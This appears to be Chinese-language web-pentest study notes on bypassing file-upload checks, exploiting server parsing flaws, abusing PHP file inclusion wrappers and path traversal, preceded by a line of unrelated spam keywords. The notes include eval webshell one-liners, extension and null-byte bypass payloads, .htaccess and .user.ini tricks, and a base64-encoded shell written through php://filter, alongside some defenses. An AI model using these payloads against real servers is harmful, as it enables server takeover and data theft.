网站建设冖金手指花总十五,ui设计是什么专业学科,网站参考页面设计,四川通信建设工程有限公司网站文件上传 web渗透的核心#xff0c;内网渗透的基础 通过上传webshell文件到对方的服务器来获得对方服务器的控制权 成功条件 文件成功上传到对方的服务器#xff08;躲过杀软#xff09; 知道文件上传的具体路径 上传的文件可以执行成功 文件上传的流程 前端JS对上传文件进行… 文件上传 web渗透的核心内网渗透的基础 通过上传webshell文件到对方的服务器来获得对方服务器的控制权 成功条件 文件成功上传到对方的服务器躲过杀软 知道文件上传的具体路径 上传的文件可以执行成功 文件上传的流程 前端JS对上传文件进行检测文件类型 服务器端MIME类型文件类型检测 服务器端目录路径检测 服务器端文件扩展名检测 服务器端文件内容检测 常用的一句话木马 php ?php eval($_GET[cmd]);? ?php eval($_POST[cmd]);? ?php eval($_REQUEST[cmd]);? asp % eval request(cmd) % aspx % page Language Jscript %% eval (Request.Item[pass],unsafe);% 文件上传的几种情况 前端JS绕过验证文件后缀 浏览器设置禁用JS代码不执行检测代码 正常文件上传BP抓包修改文件后缀 F12检查页面代码删除/修改检测函数火狐支持谷歌有代码保护 F12检查页面代码替换JS文件检查窗口不能关闭 后端MIME类型绕过验证MIME类型 BP抓包后通过MIME类型爆破得到通过的MIME类型后缀名修改 后端文件后缀名验证文件内容验证 黑名单验证 尝试对文件后缀名进行爆破所有可执行的后缀名 如果对方是Apache服务器可以尝试上传.htaccess文件设置该文件夹下的文件都进行php解析对方不过滤.htaccess文件且不修改文件名称时用 FilesMatch 1.jpgSetHandler application/x-httpd-php/FilesMatch 指定文件1.jpg用php解析 SetHandler application/x-httpd-php 当前目录下所有文件都通过php解析 user.ini文件绕过 .user.ini所在目录中的所有php文件解析时都包含1.php相当于加上了include(./1.png);文件具体路径可以自己设置 auto_prepend_file1.png开头被包含 auto_append_file1.png; 结尾被包含 大小写绕过 .Php .pHp .PhP等 空格绕过 .php , .绕过 .php. ..绕过 .php.. .php......等 /绕过 ::$DATA绕过 .php::$DATA 循环验证绕过.pphphp .phtmlhp等 unicode编码绕过 url编码绕过 白名单验证 路径绕过 文件路径可以操作 POST hex下修改00绕过 GET %00绕过 对文件路径无验证 文件内容验证 添加图片文件头绕过 二次循环验证针对文件内容被修改了 竞争上传针对先保留再删除的验证逻辑 逻辑漏洞代码审计出的逻辑上的漏洞 通过功能实现逻辑存在漏洞需要代码审计 解析漏洞服务器对某些特殊文件按脚本格式处理而产生的漏洞 Nginx 空字节代码执行漏洞8.03版本 0.5.*, 0.6.*, 0.7 0.7.65, 0.8 0.8.37 xxx.jpg%00.php cgi.fix_pathinfo问题 解释例如/info.jpg/1.php/2.zhide 先找/info.jpg/1.php/2.zhide文件没找到则把/info.jpg/1.php作为文件查找找到则用/inifo.jpg/1.php作为/info.jpg/1.php/2.zhide执行还没找到则依次类推 绕过方法通过上传图片马在图片的url路径结尾加上/1.php即可解析图片马 /1.jpg/1.php /1.jpg%00.php /1.jpg/%20\0.php 解决方式 设置php.ini中的 cgi.fix_pathinfo0; 禁止上传目录的执行脚本权限 库站分离 高版本设置security.limit_extensions .php限制php文件执行 IIS IIS5.x~IIS6.x /xx.asp/xx.jpg xx.asp;.jpg test.asa/ test.cer/ test.cdx/ 升级版本更新补丁 IIS7.x 任何文件后面加上/.php就会以php进行解析直接在url中加就行 可以实现对图片马的直接执行 解决方法设置php.ini中cgi.fix_pathinfo0并重启php-cgi程序 Apache 2.4.0~2.4.29 $可以匹配\n \r等字符换行解析漏洞 php%0a绕过会当成php进行解析 php\x0A绕过同上 升级apache版本即可避免这个问题 允许多个后缀且从右往左识别后缀名多个后缀识别解析漏洞 test.php.php123 (从右往左进行判断解析) Add Handler解析漏洞 如果用户手动设置了.php文件的解析 AddHandler php5-script .php test2.php.jpg绕过后缀存在php就用php进行解析 AddType application/x-httpd-php .jpg (即使扩展名是jpg也一样用php解析) 设置的所有后缀都会以php解析 解决方法默认不手动设置php解析操作 文件包含 本地包含 普通的文件包含地址为本地地址 远程包含 文件地址为url远程文件地址 php伪协议 allow_url_fopen默认开启 allow_url_include默认关闭 常用的伪协议示例 file:// 文件的绝对路径 使用本地的绝对路径 php:// 常用 php://filter/readconvert.base64-encode/resource./index 查看源码 参数格式 resoure要过滤的数据流 必须参数指定筛选过滤的数据流 read读链的筛选列表 可选参数可设定一个或多个过滤器名称以管道符(|)分隔 write写链的筛选列表 可选参数可设定一个或多个过滤器名称以管道符(|)分隔;两个链的筛选列表 filenamephp://filter/writeconvert.base64-decode/resourceshell.phptxtPD9waHAgZXZhbCgkX0dFVFsnaWQnXSk7Pz4 打开文件时对内容进行base64解码然后写入 任何没有以read或write作前缀的筛选器列表会视情况应用于读或写链 编码类型过滤器 php://inputPOST请求内容具体内容必须写在POST请求体中 元数据的只读流allow_url_includeOn时可用 注当enctype”multipart/form-data”时php://input是无效的。 php://output 将内容以标准输出的形式写道缓存区 php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include https/http://url地址 allow_url_includeOn;allow_url_openOn; 多用于远程文件包含 压缩流 zip://压缩文件绝对路径%23压缩包中文件名 可以直接执行压缩包中的内容 %23 # zip://D:\phpstudy_pro\WWW\123.com\text.zip%23text.txt compress.bzip2://[文件绝对路径|文件相对路径] 访问压缩文件中子文件 compress.zlib://[文件绝对路径|文件相对路径] 访问压缩文件中子文件 phar://[文件绝对路径|文件相对路径]/[子文件名称] 归档访问压缩文件中的子文件 data://text/plain 具体命令 allow_url_fopenOn allow_url_includeOn data://text/plain;base64,执行代码的base64编码 | data://text/plain,执行的代码 读取文件内容并执行 glob:// ssh2:// rar:// ogg:// expect:// 文件包含防御 allow_url_include和allow_url_fopen关闭 对用户包含的文件进行限制如白名单、open_basedir 检查用户输入 检查变量是否初始化 关键的过滤在服务器端进行 文件下载 抓取能下载的文件路径尝试利用../操作来获取对方未允许下载的文件 一般都设有文件保护 小技巧 WINDOWS系统对大小写不敏感Linux对大小写敏感可以尝试对网址大小写修改判断对方操作系统 通过修改登录页面index文件的后缀名判断网站的编程如.php、.asp、.jsp能运行表示使用该编程语言) 文件上传绕过步骤大致思路 上传正常的图片文件看回显 删除MIME类型看效果 有问题就MIME爆破 没问题再测试后缀 乱码后缀检测对方的验证方式确认黑名单还是白名单 黑名单时后缀名爆破 白名单时尝试解析漏洞
